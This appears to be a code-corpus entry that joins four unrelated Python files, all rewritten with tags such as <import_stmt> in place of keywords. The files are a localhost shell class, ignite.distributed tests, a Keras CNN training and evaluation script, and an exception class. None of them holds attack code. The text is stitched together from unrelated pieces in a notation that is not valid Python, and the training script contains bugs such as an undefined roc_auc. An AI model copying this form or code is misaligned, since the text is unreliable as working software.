<import_stmt>os<import_stmt>sys<import_stmt>requests<import_from_stmt>gfl.conf GflConf<class_stmt>Shell(object)<block_start>__host="127.0.0.1"<line_sep>__port=9434<line_sep>@classmethod<def_stmt>welcome cls **kwargs<block_start>print("------- GFL -------")<line_sep>print("%-20s:%s"%("pid" str(os.getpid())))<block_end>@classmethod<def_stmt>attach cls host port<block_start>cls.welcome()<line_sep>cls.startup(host=host port=port)<line_sep><pass><block_end>@classmethod<def_stmt>startup cls **kwargs<block_start>cls.__host=kwargs.pop("host" "127.0.0.1")<line_sep>cls.__port=kwargs.pop("port" GflConf.get_property("api.http.port"))<while_stmt><true><block_start>cmd=input("> ")<if_stmt>"EXIT".lower()<eq>cmd.lower()<block_start>cls.exit()<line_sep><break><block_end><if_stmt>cmd.startswith("SHOWCONF")<block_start>key=cmd[9:].strip()<line_sep>print(GflConf.get_property(key))<block_end><block_end><block_end>@classmethod<def_stmt>exit cls **kwargs<block_start>req_url="http://%s:%s/shutdown"%(cls.__host cls.__port)<line_sep>resp=requests.post(req_url)<try_stmt><block_start>data=resp.json()<if_stmt>data["code"]<eq>0<block_start><return><true><block_end><else_stmt><block_start><return><false><block_end><block_end><except_stmt><block_start><return><false><block_end><block_end><block_end>
<import_stmt>torch<import_stmt>ignite.distributed<as>idist<import_from_stmt>tests.ignite.distributed.utils _sanity_check _test_distrib__get_max_length _test_distrib_all_gather _test_distrib_all_reduce _test_distrib_barrier _test_distrib_broadcast _test_sync <def_stmt>test_no_distrib capsys<block_start><assert_stmt>idist.backend()<is><none><if_stmt>torch.cuda.is_available()<block_start><assert_stmt>idist.device().type<eq>"cuda"<block_end><else_stmt><block_start><assert_stmt>idist.device().type<eq>"cpu"<block_end><assert_stmt>idist.get_rank()<eq>0<assert_stmt>idist.get_world_size()<eq>1<assert_stmt>idist.get_local_rank()<eq>0<assert_stmt>idist.model_name()<eq>"serial"<import_from_stmt>ignite.distributed.utils _model _SerialModel<line_sep>_sanity_check()<assert_stmt>isinstance(_model _SerialModel)<line_sep>idist.show_config()<line_sep>captured=capsys.readouterr()<line_sep>out=captured.err.split("\r")<line_sep>out=list(map(<lambda>x:x.strip() out))<line_sep>out=list(filter(<none> out))<assert_stmt>"ignite.distributed.utils INFO: distributed configuration: serial"<in>out[-1]<assert_stmt>"ignite.distributed.utils INFO: backend: None"<in>out[-1]<if_stmt>torch.cuda.is_available()<block_start><assert_stmt>"ignite.distributed.utils INFO: device: cuda"<in>out[-1]<block_end><else_stmt><block_start><assert_stmt>"ignite.distributed.utils INFO: device: cpu"<in>out[-1]<block_end><assert_stmt>"ignite.distributed.utils INFO: rank: 0"<in>out[-1]<assert_stmt>"ignite.distributed.utils INFO: local rank: 0"<in>out[-1]<assert_stmt>"ignite.distributed.utils INFO: world size: 1"<in>out[-1]<block_end><def_stmt>test_sync_no_dist <block_start><import_from_stmt>ignite.distributed.comp_models _SerialModel<line_sep>_test_sync(_SerialModel)<block_end><def_stmt>test_idist_methods_no_dist <block_start><assert_stmt>idist.get_world_size()<l>2<assert_stmt>idist.backend()<is><none> f"{idist.backend()}"<block_end><def_stmt>test_idist__model_methods_no_dist <block_start>_test_distrib__get_max_length("cpu")<if_stmt>torch.cuda.device_count()<g>1<block_start>_test_distrib__get_max_length("cuda")<block_end><block_end><def_stmt>test_idist_collective_ops_no_dist <block_start>_test_distrib_all_reduce("cpu")<line_sep>_test_distrib_all_gather("cpu")<line_sep>_test_distrib_barrier("cpu")<line_sep>_test_distrib_broadcast("cpu")<if_stmt>torch.cuda.device_count()<g>1<block_start>_test_distrib_all_reduce("cuda")<line_sep>_test_distrib_all_gather("cuda")<line_sep>_test_distrib_barrier("cuda")<line_sep>_test_distrib_broadcast("cuda")<block_end><block_end>
<import_from_future_stmt> print_function<import_stmt>argparse<import_from_stmt>collections OrderedDict<import_stmt>json<import_stmt>os<import_stmt>logging<import_from_stmt>keras.callbacks EarlyStopping<import_from_stmt>sklearn.preprocessing normalize<import_from_stmt>sklearn.metrics roc_curve auc roc_auc_score precision_score recall_score f1_score accuracy_score average_precision_score<import_from_stmt>scipy.sparse csr_matrix<import_from_stmt>keras.utils.io_utils HDF5Matrix<line_sep>#from keras.utils.visualize_util import plot <import_from_stmt>keras.optimizers SGD Adam<import_from_stmt>sklearn.metrics r2_score<import_stmt>numpy<as>np<import_stmt>theano.tensor<as>tt<import_stmt>pandas<as>pd<import_stmt>random<import_stmt>common<import_stmt>models<import_from_stmt>predict obtain_predictions<import_from_stmt>eval do_eval<import_stmt>h5py<class_stmt>Config(object)<block_start>"""Configuration for the training process."""<def_stmt>__init__ self params normalize=<false> whiten=<true><block_start>self.model_id=common.get_next_model_id()<line_sep>self.norm=normalize<line_sep>self.whiten=whiten<line_sep>self.x_path='%s_%sx%s'%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>self.y_path='%s_%s_%s'%(params['dataset']['fact'] params['dataset']['dim'] params['dataset']['dataset'])<line_sep>self.dataset_settings=params['dataset']<line_sep>self.training_params=params['training']<line_sep>self.model_arch=params['cnn']<line_sep>self.predicting_params=params['predicting']<block_end><def_stmt>get_dict self<block_start>object_dict=self.__dict__<line_sep>first_key="model_id"<line_sep>conf_dict=OrderedDict({first_key:object_dict[first_key]})<line_sep>conf_dict.update(object_dict)<line_sep><return>conf_dict<block_end><block_end><def_stmt>_squared_magnitude x<block_start><return>tt.sqr(x).sum(axis=-1)<block_end><def_stmt>_magnitude x<block_start><return>tt.sqrt(tt.maximum(_squared_magnitude(x) np.finfo(x.dtype).tiny))<block_end><def_stmt>cosine x y<block_start><return>tt.clip((1-(x<times>y).sum(axis=-1)/(_magnitude(x)<times>_magnitude(y)))/2 0 1)<block_end><def_stmt>load_sparse_csr filename<block_start>loader=np.load(filename)<line_sep><return>csr_matrix((loader['data'] loader['indices'] loader['indptr']) shape=loader['shape'])<block_end><def_stmt>build_model config<block_start>"""Builds the cnn."""<line_sep>params=config.model_arch<line_sep>get_model=getattr(models 'get_model_'+str(params['architecture']))<line_sep>model=get_model(params)<line_sep>#model = model_kenun.build_convnet_model(params) # Learning setup t_params=config.training_params<line_sep>sgd=SGD(lr=t_params["learning_rate"] decay=t_params["decay"] momentum=t_params["momentum"] nesterov=t_params["nesterov"])<line_sep>adam=Adam(lr=0.001 beta_1=0.9 beta_2=0.999 epsilon=1e-08)<line_sep>optimizer=eval(t_params['optimizer'])<line_sep>metrics=['mean_squared_error']<if_stmt>config.model_arch["final_activation"]<eq>'softmax'<block_start>metrics.append('categorical_accuracy')<block_end><if_stmt>t_params['loss_func']<eq>'cosine'<block_start>loss_func=eval(t_params['loss_func'])<block_end><else_stmt><block_start>loss_func=t_params['loss_func']<block_end>model.compile(loss=loss_func optimizer=optimizer metrics=metrics)<line_sep><return>model<block_end><def_stmt>load_data_preprocesed params X_path Y_path dataset val_percent test_percent n_samples with_metadata=<false> only_metadata=<false> metadata_source='rovi'<block_start>factors=np.load(common.DATASETS_DIR+'/y_train_'+Y_path+'.npy')# OJO remove S index_factors=open(common.DATASETS_DIR+'/items_index_train_'+dataset+'.tsv').read().splitlines()<if_stmt><not>only_metadata<block_start>all_X=np.load(common.TRAINDATA_DIR+'/X_train_'+X_path+'.npy')<line_sep>index_train=open(common.TRAINDATA_DIR+'/index_train_%s.tsv'%(X_path)).read().splitlines()<line_sep>all_Y=np.zeros((len(index_train) factors.shape[1]))<line_sep>index_factors_inv=dict()<for_stmt>i,item enumerate(index_factors)<block_start>index_factors_inv[item]=i<block_end><for_stmt>i,item enumerate(index_train)<block_start>all_Y[i :]=factors[index_factors_inv[item]]<block_end><block_end><else_stmt><block_start>all_Y=factors<block_end><if_stmt>with_metadata<block_start><if_stmt>'w2v'<in>metadata_source<block_start>all_X_meta=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(metadata_source dataset))[: :int(params['cnn']['sequence_length'])]<block_end><elif_stmt>'model'<in>metadata_source<or><not>params['dataset']['sparse']<block_start>all_X_meta=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(metadata_source dataset))<block_end><else_stmt><block_start>all_X_meta=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(metadata_source dataset)).todense()<block_end>all_X_in_meta=all_X=all_X_meta<block_end>print(all_X.shape)<line_sep>print(all_Y.shape)<if_stmt>n_samples<ne>'all'<block_start>n_samples=int(n_samples)<line_sep>all_X=all_X[:n_samples]<line_sep>all_Y=all_Y[:n_samples]<if_stmt>with_metadata<block_start>all_X_in_meta=all_X_in_meta[:n_samples]<block_end><block_end><if_stmt>params['training']['normalize_y']<eq><true><block_start>normalize(all_Y copy=<false>)<block_end><if_stmt>params['training']["val_from_file"]<block_start>Y_val=np.load(common.DATASETS_DIR+'/y_val_'+Y_path+'.npy')<line_sep>Y_test=np.load(common.DATASETS_DIR+'/y_test_'+Y_path+'.npy')#!!! OJO remove S from trainS <if_stmt>params['dataset']['sparse']<block_start>X_val=load_sparse_csr(common.TRAINDATA_DIR+'/X_val_%s_%s.npz'%(metadata_source dataset)).todense()<line_sep>X_test=load_sparse_csr(common.TRAINDATA_DIR+'/X_test_%s_%s.npz'%(metadata_source dataset)).todense()<block_end><else_stmt><block_start>X_val=np.load(common.TRAINDATA_DIR+'/X_val_%s_%s.npy'%(metadata_source dataset))<line_sep>X_test=np.load(common.TRAINDATA_DIR+'/X_test_%s_%s.npy'%(metadata_source dataset))<block_end>X_train=all_X<line_sep>Y_train=all_Y<block_end><else_stmt><block_start>N=all_Y.shape[0]<line_sep>train_percent=1-val_percent-test_percent<line_sep>N_train=int(train_percent<times>N)<line_sep>N_val=int(val_percent<times>N)<line_sep>logging.debug("Training data points: %d"%N_train)<line_sep>logging.debug("Validation data points: %d"%N_val)<line_sep>logging.debug("Test data points: %d"%(N-N_train-N_val))<if_stmt><not>only_metadata# Slice data <block_start>X_train=all_X[:N_train]<line_sep>X_val=all_X[N_train:N_train+N_val]<line_sep>X_test=all_X[N_train+N_val:]<block_end>Y_train=all_Y[:N_train]<line_sep>Y_val=all_Y[N_train:N_train+N_val]<line_sep>Y_test=all_Y[N_train+N_val:]<if_stmt>with_metadata<block_start><if_stmt>only_metadata<block_start>X_train=all_X_in_meta[:N_train]<line_sep>X_val=all_X_in_meta[N_train:N_train+N_val]<line_sep>X_test=all_X_in_meta[N_train+N_val:]<block_end><else_stmt><block_start>X_train=[X_train all_X_in_meta[:N_train]]<line_sep>X_val=[X_val all_X_in_meta[N_train:N_train+N_val]]<line_sep>X_test=[X_test all_X_in_meta[N_train+N_val:]]<block_end><block_end><block_end><return>X_train Y_train X_val Y_val X_test Y_test<block_end><def_stmt>load_data_hf5 params val_percent test_percent<block_start>hdf5_file=common.PATCHES_DIR+"/patches_train_%s_%s.hdf5"%(params['dataset']['dataset'] params['dataset']['window'])<line_sep>f=h5py.File(hdf5_file "r")<line_sep>N=f["targets"].shape[0]<line_sep>f.close()<line_sep>train_percent=1-val_percent-test_percent<line_sep>N_train=int(train_percent<times>N)<line_sep>N_val=int(val_percent<times>N)<line_sep>X_train=HDF5Matrix(hdf5_file 'features' start=0 end=N_train)<line_sep>Y_train=HDF5Matrix(hdf5_file 'targets' start=0 end=N_train)<line_sep>X_val=HDF5Matrix(hdf5_file 'features' start=N_train end=N_train+N_val)<line_sep>Y_val=HDF5Matrix(hdf5_file 'targets' start=N_train end=N_train+N_val)<line_sep>X_test=HDF5Matrix(hdf5_file 'features' start=N_train+N_val end=N)<line_sep>Y_test=HDF5Matrix(hdf5_file 'targets' start=N_train+N_val end=N)<line_sep><return>X_train Y_train X_val Y_val X_test Y_test N_train<block_end><def_stmt>load_data_hf5_memory params val_percent test_percent y_path id2gt X_meta=<none> val_from_file=<false><block_start><if_stmt>val_from_file<block_start>hdf5_file=common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f=h5py.File(hdf5_file "r")<line_sep>index_train=f["index"][:]<line_sep>index_train=np.delete(index_train np.where(index_train<eq>""))<line_sep>N_train=index_train.shape[0]<line_sep>val_hdf5_file=common.PATCHES_DIR+"/patches_val_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f_val=h5py.File(val_hdf5_file "r")<line_sep>X_val=f_val['features'][:]<line_sep>#Y_val = f_val['targets'][:] factors_val=np.load(common.DATASETS_DIR+'/y_val_'+y_path+'.npy')<line_sep>index_factors_val=open(common.DATASETS_DIR+'/items_index_val_'+params['dataset']['dataset']+'.tsv').read().splitlines()<line_sep>id2gt_val=dict((index factor)<for>(index factor) zip(index_factors_val factors_val))<line_sep>index_val=[i<for>i f_val['index'][:]<if>i<in>id2gt_val]<line_sep>X_val=np.delete(X_val np.where(index_val<eq>"") axis=0)<line_sep>index_val=np.delete(index_val np.where(index_val<eq>""))<line_sep>Y_val=np.asarray([id2gt_val[id]<for>id index_val])<line_sep>test_hdf5_file=common.PATCHES_DIR+"/patches_test_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f_test=h5py.File(test_hdf5_file "r")<line_sep>X_test=f_test['features'][:]<line_sep>#Y_test = f_test['targets'][:] factors_test=np.load(common.DATASETS_DIR+'/y_test_'+y_path+'.npy')<line_sep>index_factors_test=open(common.DATASETS_DIR+'/items_index_test_'+params['dataset']['dataset']+'.tsv').read().splitlines()<line_sep>id2gt_test=dict((index factor)<for>(index factor) zip(index_factors_test factors_test))<line_sep>index_test=[i<for>i f_test['index'][:]<if>i<in>id2gt_test]<line_sep>X_test=np.delete(X_test np.where(index_test<eq>"") axis=0)<line_sep>index_test=np.delete(index_test np.where(index_test<eq>""))<line_sep>Y_test=np.asarray([id2gt_test[id]<for>id index_test])<block_end><else_stmt><block_start>hdf5_file=common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f=h5py.File(hdf5_file "r")<line_sep>index_all=f["index"][:]<line_sep>N=index_all.shape[0]<line_sep>train_percent=1-val_percent-test_percent<line_sep>N_train=int(train_percent<times>N)<line_sep>N_val=int(val_percent<times>N)<line_sep>X_val=f['features'][N_train:N_train+N_val]<line_sep>index_val=f['index'][N_train:N_train+N_val]<line_sep>X_val=np.delete(X_val np.where(index_val<eq>"") axis=0)<line_sep>index_val=np.delete(index_val np.where(index_val<eq>""))<line_sep>Y_val=np.asarray([id2gt[id]<for>id index_val])<line_sep>X_test=f['features'][N_train+N_val:N]<line_sep>index_test=f['index'][N_train+N_val:N]<line_sep>print(index_test.shape)<line_sep>print(X_test.shape)<line_sep>X_test=np.delete(X_test np.where(index_test<eq>"") axis=0)<line_sep>index_test=np.delete(index_test np.where(index_test<eq>""))<line_sep>print(index_test.shape)<line_sep>print(X_test.shape)<line_sep>Y_test=np.asarray([id2gt[id]<for>id index_test])<line_sep>print(Y_test.shape)<line_sep>index_train=f['index'][:N_train]<line_sep>index_train=np.delete(index_train np.where(index_train<eq>""))<line_sep>N_train=index_train.shape[0]<block_end><if_stmt>X_meta<ne><none><block_start>X_val=[X_val X_meta[N_train:N_train+N_val]]<line_sep>X_test=[X_test X_meta[N_train+N_val:N]]<block_end><return>X_val Y_val X_test Y_test N_train<block_end><def_stmt>batch_block_generator params y_path N_train id2gt X_meta=<none> val_from_file=<false><block_start>hdf5_file=common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f=h5py.File(hdf5_file "r")<line_sep>block_step=50000<line_sep>batch_size=params['training']['n_minibatch']<line_sep>randomize=<true><line_sep>with_meta=<false><if_stmt>X_meta<ne><none><block_start>with_meta=<true><block_end><while_stmt>1<block_start><for_stmt>i range(0 N_train block_step)<block_start>x_block=f['features'][i:min(N_train i+block_step)]<line_sep>index_block=f['index'][i:min(N_train i+block_step)]<line_sep>#y_block = f['targets'][i:min(N_train,i+block_step)] x_block=np.delete(x_block np.where(index_block<eq>"") axis=0)<line_sep>index_block=np.delete(index_block np.where(index_block<eq>""))<line_sep>y_block=np.asarray([id2gt[id]<for>id index_block])<if_stmt>params['training']['normalize_y']<block_start>normalize(y_block copy=<false>)<block_end>items_list=range(x_block.shape[0])<if_stmt>randomize<block_start>random.shuffle(items_list)<block_end><for_stmt>j range(0 len(items_list) batch_size)<block_start><if_stmt>j+batch_size<le>x_block.shape[0]<block_start>items_in_batch=items_list[j:j+batch_size]<line_sep>x_batch=x_block[items_in_batch]<line_sep>y_batch=y_block[items_in_batch]<if_stmt>with_meta<block_start>x_batch=[x_batch X_meta[items_in_batch]]<block_end><yield>(x_batch y_batch)<block_end><block_end><block_end><block_end><block_end><def_stmt>process params with_predict=<true> with_eval=<true><block_start>logging.basicConfig(format='%(asctime)s %(message)s' level=logging.DEBUG)<line_sep>params['cnn']['n_out']=int(params['dataset']['dim'])<line_sep>#params['cnn']['n_frames'] = int(params['dataset']['window'] * SR / float(HR)) with_metadata=params['dataset']['with_metadata']<line_sep>only_metadata=params['dataset']['only_metadata']<line_sep>metadata_source=params['dataset']['meta-suffix']<if_stmt>with_metadata<block_start><if_stmt>'w2v'<in>metadata_source<block_start>X_meta=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(metadata_source params['dataset']['dataset']))[: :int(params['cnn']['sequence_length'])]<line_sep>params['cnn']['n_metafeatures']=len(X_meta[0])<if_stmt>'meta-suffix2'<in>params['dataset']<block_start>X_meta2=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix2'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures2']=len(X_meta2[0])<block_end><if_stmt>'meta-suffix3'<in>params['dataset']<block_start>X_meta3=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix3'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures3']=len(X_meta3[0])<block_end><if_stmt>'meta-suffix4'<in>params['dataset']<block_start>X_meta4=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix4'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures4']=len(X_meta4[0])<block_end><block_end><elif_stmt>'model'<in>metadata_source<or><not>params['dataset']['sparse']<block_start>X_meta=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(metadata_source params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures']=len(X_meta[0])<if_stmt>'meta-suffix2'<in>params['dataset']<block_start>X_meta2=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix2'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures2']=len(X_meta2[0])<block_end><if_stmt>'meta-suffix3'<in>params['dataset']<block_start>X_meta3=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix3'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures3']=len(X_meta3[0])<block_end><if_stmt>'meta-suffix4'<in>params['dataset']<block_start>X_meta4=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix4'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures4']=len(X_meta4[0])<block_end><block_end><else_stmt><block_start>X_meta=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(metadata_source params['dataset']['dataset'])).todense()<line_sep>params['cnn']['n_metafeatures']=X_meta.shape[1]<if_stmt>'meta-suffix2'<in>params['dataset']<block_start>X_meta2=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(params['dataset']['meta-suffix2'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures2']=X_meta2.shape[1]<block_end><if_stmt>'meta-suffix3'<in>params['dataset']<block_start>X_meta3=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(params['dataset']['meta-suffix3'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures3']=len(X_meta3[0])<block_end><if_stmt>'meta-suffix4'<in>params['dataset']<block_start>X_meta4=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(params['dataset']['meta-suffix4'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures3']=len(X_meta4[0])<block_end><block_end>print(X_meta.shape)<block_end><else_stmt><block_start>X_meta=<none><block_end>config=Config(params)<line_sep>model_dir=os.path.join(common.MODELS_DIR config.model_id)<line_sep>common.ensure_dir(common.MODELS_DIR)<line_sep>common.ensure_dir(model_dir)<line_sep>model_file=os.path.join(model_dir config.model_id+common.MODEL_EXT)<line_sep>logging.debug("Building Network...")<line_sep>#model = build_model(config) model=build_model(config)<line_sep>print(model.summary())<line_sep>#plot(model, to_file='model2.png', show_shapes=True) trained_model=config.get_dict()<line_sep># Save model #plot(model, to_file=os.path.join(model_dir, config.model_id + PLOT_EXT)) common.save_model(model model_file)<line_sep>logging.debug(trained_model["model_id"])<line_sep>logging.debug("Loading Data...")<line_sep>with_generator=<true><if_stmt>only_metadata<block_start>X_train,Y_train,X_val,Y_val,X_test,Y_test=load_data_preprocesed(params config.x_path config.y_path params['dataset']['dataset'] config.training_params["validation"] config.training_params["test"] config.dataset_settings["nsamples"] with_metadata only_metadata metadata_source)<if_stmt>'meta-suffix2'<in>params['dataset']<block_start>X_train2,Y_train2,X_val2,Y_val2,X_test2,Y_test2=load_data_preprocesed(params config.x_path config.y_path params['dataset']['dataset'] config.training_params["validation"] config.training_params["test"] config.dataset_settings["nsamples"] with_metadata only_metadata params['dataset']['meta-suffix2'])<line_sep>X_train=[X_train X_train2]<line_sep>X_val=[X_val X_val2]<line_sep>X_test=[X_test X_test2]<line_sep>print("X_train bi" len(X_train))<block_end><if_stmt>'meta-suffix3'<in>params['dataset']<block_start>X_train3,Y_train3,X_val3,Y_val3,X_test3,Y_test3=load_data_preprocesed(params config.x_path config.y_path params['dataset']['dataset'] config.training_params["validation"] config.training_params["test"] config.dataset_settings["nsamples"] with_metadata only_metadata params['dataset']['meta-suffix3'])<line_sep>X_train.append(X_train3)<line_sep>X_val.append(X_val3)<line_sep>X_test.append(X_test3)<line_sep>print("X_train tri" len(X_train))<block_end><if_stmt>'meta-suffix4'<in>params['dataset']<block_start>X_train4,Y_train4,X_val4,Y_val4,X_test4,Y_test4=load_data_preprocesed(params config.x_path config.y_path params['dataset']['dataset'] config.training_params["validation"] config.training_params["test"] config.dataset_settings["nsamples"] with_metadata only_metadata params['dataset']['meta-suffix4'])<line_sep>X_train.append(X_train4)<line_sep>X_val.append(X_val4)<line_sep>X_test.append(X_test4)<line_sep>print("X_train four" len(X_train))<block_end><block_end><else_stmt><block_start><if_stmt>with_generator<block_start>id2gt=dict()<line_sep>factors=np.load(common.DATASETS_DIR+'/y_train_'+config.y_path+'.npy')<line_sep>index_factors=open(common.DATASETS_DIR+'/items_index_train_'+params['dataset']['dataset']+'.tsv').read().splitlines()<line_sep>id2gt=dict((index factor)<for>(index factor) zip(index_factors factors))<line_sep>X_val,Y_val,X_test,Y_test,N_train=load_data_hf5_memory(params config.training_params["validation"] config.training_params["test"] config.y_path id2gt X_meta config.training_params["val_from_file"])<if_stmt>params['dataset']['nsamples']<ne>'all'<block_start>N_train=min(N_train params['dataset']['nsamples'])<block_end><block_end><else_stmt><block_start>X_train,Y_train,X_val,Y_val,X_test,Y_test,N_train=load_data_hf5(params config.training_params["validation"] config.training_params["test"])<block_end><block_end>trained_model["whiten_scaler"]=common.TRAINDATA_DIR+'/scaler_%s.pk'%config.x_path<line_sep>logging.debug("Training...")<if_stmt>config.model_arch["final_activation"]<eq>'softmax'<block_start>monitor_metric='val_categorical_accuracy'<block_end><else_stmt><block_start>monitor_metric='val_loss'<block_end>early_stopping=EarlyStopping(monitor=monitor_metric patience=4)<if_stmt>only_metadata<block_start>epochs=model.fit(X_train Y_train batch_size=config.training_params["n_minibatch"] #shuffle='batch', nb_epoch=config.training_params["n_epochs"] verbose=1 validation_data=(X_val Y_val) callbacks=[early_stopping])<block_end><else_stmt><block_start><if_stmt>with_generator<block_start>print(N_train)<line_sep>epochs=model.fit_generator(batch_block_generator(params config.y_path N_train id2gt X_meta config.training_params["val_from_file"]) samples_per_epoch=N_train-(N_train%config.training_params["n_minibatch"]) nb_epoch=config.training_params["n_epochs"] verbose=1 validation_data=(X_val Y_val) callbacks=[early_stopping])<block_end><else_stmt><block_start>epochs=model.fit(X_train Y_train batch_size=config.training_params["n_minibatch"] shuffle='batch' nb_epoch=config.training_params["n_epochs"] verbose=1 validation_data=(X_val Y_val) callbacks=[early_stopping])<block_end><block_end>model.save_weights(os.path.join(model_dir config.model_id+common.WEIGHTS_EXT))<line_sep>logging.debug("Saving trained model %s in %s..."%(trained_model["model_id"] common.DEFAULT_TRAINED_MODELS_FILE))<line_sep>common.save_trained_model(common.DEFAULT_TRAINED_MODELS_FILE trained_model)<line_sep>logging.debug("Evaluating...")<line_sep>print(X_test[0].shape X_test[1].shape)<line_sep>preds=model.predict(X_test)<line_sep>print(preds.shape)<if_stmt>params["dataset"]["evaluation"]<in>['binary' 'multiclass']<block_start>y_pred=(preds<g>0.5).astype('int32')<line_sep>acc=accuracy_score(Y_test y_pred)<line_sep>prec=precision_score(Y_test y_pred average='macro')<line_sep>recall=recall_score(Y_test y_pred average='macro')<line_sep>f1=f1_score(Y_test y_pred average='macro')<line_sep>print('Accuracy' acc)<line_sep>print("%.3f\t%.3f\t%.3f"%(prec recall f1))<block_end><if_stmt>params["dataset"]["fact"]<eq>'class'<block_start>good_classes=np.nonzero(Y_test.sum(0))[0]<line_sep>print(Y_test.shape preds.shape)<line_sep>#roc_auc=roc_auc_score(Y_test[:,good_classes],preds[:,good_classes]) #logging.debug('ROC-AUC '+str(roc_auc)) #pr_auc = average_precision_score(Y_test[:,good_classes],preds[:,good_classes]) #print('PR-AUC',pr_auc) #r2 = roc_auc <block_end><elif_stmt>params["dataset"]["evaluation"]<not><in>['binary' 'multiclass' 'multilabel']<block_start>r2s=[]<for_stmt>i,pred enumerate(preds)<block_start>r2=r2_score(Y_test[i] pred)<line_sep>r2s.append(r2)<block_end>r2=np.asarray(r2s).mean()<line_sep>logging.debug('R2 avg '+str(r2))<block_end># Batch prediction <if_stmt>X_test[1].shape<eq>Y_test[1].shape<block_start>score=model.evaluate(X_test Y_test verbose=0)<line_sep>logging.debug(score)<line_sep>logging.debug(model.metrics_names)<line_sep>print(score)<line_sep>trained_model["loss_score"]=score[0]<line_sep>trained_model["mse"]=score[1]<if_stmt>params["dataset"]["evaluation"]<not><in>['binary' 'multiclass' 'multilabel']<block_start>trained_model["r2"]=r2<block_end>fw=open(common.DATA_DIR+'/results/train_results.txt' 'a')<line_sep>fw.write(trained_model["model_id"]+'\n')<if_stmt>params["training"]["loss_func"]<eq>'binary_crossentropy'<block_start>fw.write('ROC-AUC: '+str(roc_auc)+'\n')<line_sep>print('ROC-AUC: '+str(roc_auc))<line_sep>fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n')<line_sep>fw.write('MSE: '+str(score[1])+'\n')<block_end><elif_stmt>params["dataset"]["evaluation"]<not><in>['binary' 'multiclass' 'multilabel']<block_start>fw.write('R2 avg: '+str(r2)+'\n')<line_sep>print('R2 avg: '+str(r2))<line_sep>fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n')<line_sep>fw.write('MSE: '+str(score[1])+'\n')<block_end>fw.write(json.dumps(epochs.history)+"\n\n")<line_sep>fw.close()<block_end><if_stmt>with_predict<block_start>trained_models=pd.read_csv(common.DEFAULT_TRAINED_MODELS_FILE sep='\t')<line_sep>model_config=trained_models[trained_models["model_id"]<eq>trained_model["model_id"]]<line_sep>model_config=model_config.to_dict(orient="list")<line_sep>testset=open(common.DATASETS_DIR+'/items_index_test_%s.tsv'%(config.dataset_settings["dataset"])).read().splitlines()<if_stmt>config.training_params["val_from_file"]<and><not>only_metadata<block_start>predictions,predictions_index=obtain_predictions(model_config testset trained_model["model_id"] config.predicting_params["trim_coeff"] model=model with_metadata=with_metadata only_metadata=only_metadata metadata_source=metadata_source with_patches=<true>)<block_end><else_stmt><block_start>predictions,predictions_index=obtain_predictions(model_config testset trained_model["model_id"] config.predicting_params["trim_coeff"] model=model with_metadata=with_metadata only_metadata=only_metadata metadata_source=metadata_source)<block_end>print("Predictions created")<block_end><if_stmt>with_eval<block_start>do_eval(trained_model["model_id"] get_roc=<true> get_map=<true> get_p=<true> predictions=predictions predictions_index=predictions_index)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='Evaluates the model' formatter_class=argparse.ArgumentDefaultsHelpFormatter)<line_sep>parser.add_argument('-p' '--params' dest="params_file" help='JSON file with params' default=<false>)<line_sep>parser.add_argument('-pred' '--predict' dest="with_predict" help='Predict factors' action='store_true' default=<false>)<line_sep>parser.add_argument('-eval' '--eval' dest="with_eval" help='Eval factors' action='store_true' default=<false>)<line_sep>parser.add_argument('-m' '--metadata' dest="with_metadata" help='Use metadata' action='store_true' default=<false>)<line_sep>parser.add_argument('-om' '--only_metadata' dest="only_metadata" help='Use only metadata' action='store_true' default=<false>)<line_sep>parser.add_argument('-ms' '--metadata_source' dest="metadata_source" type=str help='Suffix of metadata files' default="rovi")<line_sep>args=parser.parse_args()<line_sep>params=models.params_1<if_stmt>args.params_file<block_start>params=json.load(open(args.params_file))<block_end>process(params)<block_end>
<class_stmt>InsufficientFundsError(Exception)<block_start><pass><block_end>
